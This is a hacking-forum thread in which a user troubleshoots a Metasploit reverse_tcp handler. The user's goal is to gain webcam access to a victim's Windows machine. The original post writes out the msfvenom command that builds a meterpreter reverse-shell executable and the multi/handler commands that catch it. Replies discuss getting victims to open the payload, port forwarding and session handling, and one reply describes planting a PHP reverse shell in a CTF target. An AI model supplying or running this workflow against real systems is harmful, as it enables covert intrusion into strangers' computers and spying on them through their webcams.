Forum Thread: Metasploit reverse_tcp Handler Problem

Hi, I am a Kali Linux user,
and I used metasploit to get access of the webcam.
In the last virtual machine, it worked well, but in this virtual machine, the payload does not execute.
I did :
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.x.x LPORT=4444 -f exe > /root/Desktop/abc.exe

Until now, It successfully worked, but in the metasploit framework console,

use exploit/multi/handler
set LHOST 192.168.xx
set LPORT 4444
exploit -j -z
then it says
Exploit running as background job 0.
Started reverse TCP handler on 192.168.x.x:4444

Then it does nothing.
So I can not even use Veil,TheFatRat,zirikatu now.....
Please Help.

Get The Weekly Null Byte Newsletter

Never miss a Null Byte guide.

24 Responses

It means that it's waiting the user to open the payload ....
And when user will open the payload it will look like this ....

And if it didn't automaticly didn't redirect you to meterpreter do:
sessions -i
And it will look like this:

And if the user didn't open the payload it will look like this :

>If user is not on your network then you must port forward !<

Yes, I know that the victim should open the payload.... But my problem is that it just does not work.. Here is the picture.

Yes, I know that the victim should open the payload.... But my problem is that it just does not work.. Here is the picture.

Whic operating system are you using because that usn't kali linux

It is Kali linux, I just changed the background and the looking....

I will look up for you ...
I will reply you when i find the answer

Open the payload and if it respond it is all ok

So the problem is that it does not respond....

How to open the payload i am new in Kali Linux

Oh, Problem solved... I just needed to do upgrading and adding port 4444 to the virtual machine :P By the way, rubixpower, I really appreciate your help, if it wasn't you, I might have not figured out what the problem is...

I am happy that you solved that problem :) if you need help somewhere else just reply me here and i will reply you as fast a possible ...



I am facing the same issue. Could you please help me how to upgrade and adding port 4444....
Thanks in Advance

i added the port but still its not me out

hello Justin i have the same problem whould you like to help me out..

how did you upgrade the port number and encounter this problem can u help me with it

me too, i am doing the mr robot ctf.
i have changed the original 404.php code to the shell php code from pentestmonkeys. (changed the ip and port ofc)
but i dont get any response on netcat or metaspoilt.

my host is win10, kali and the mr robot server are on virtualbox, both with "bridged" connection... could the "bridged" connection cause this problem?

hi please someone helps me out from it

i have an issu
e to metasploit that it stucks at
staring handler on tcp 0.0.0. 0:4444
starting handler .........
and just stucks down
i m using kali linu
x 2016.2

hey there!

facing the same get stuck when i start the exploit. However, i analized the lport with wireshark and i saw that the victims app is sending requests...dont know what to do!!

Facing the same issue also need the upgrader.apk file is their any other way to create it.

Please provide if so.

My terminal stop at this...i am using kali linux 2019.1 and my terminal did nothing after this

Same problem bro could you please help

Share Your Thoughts

  • Hot
  • Active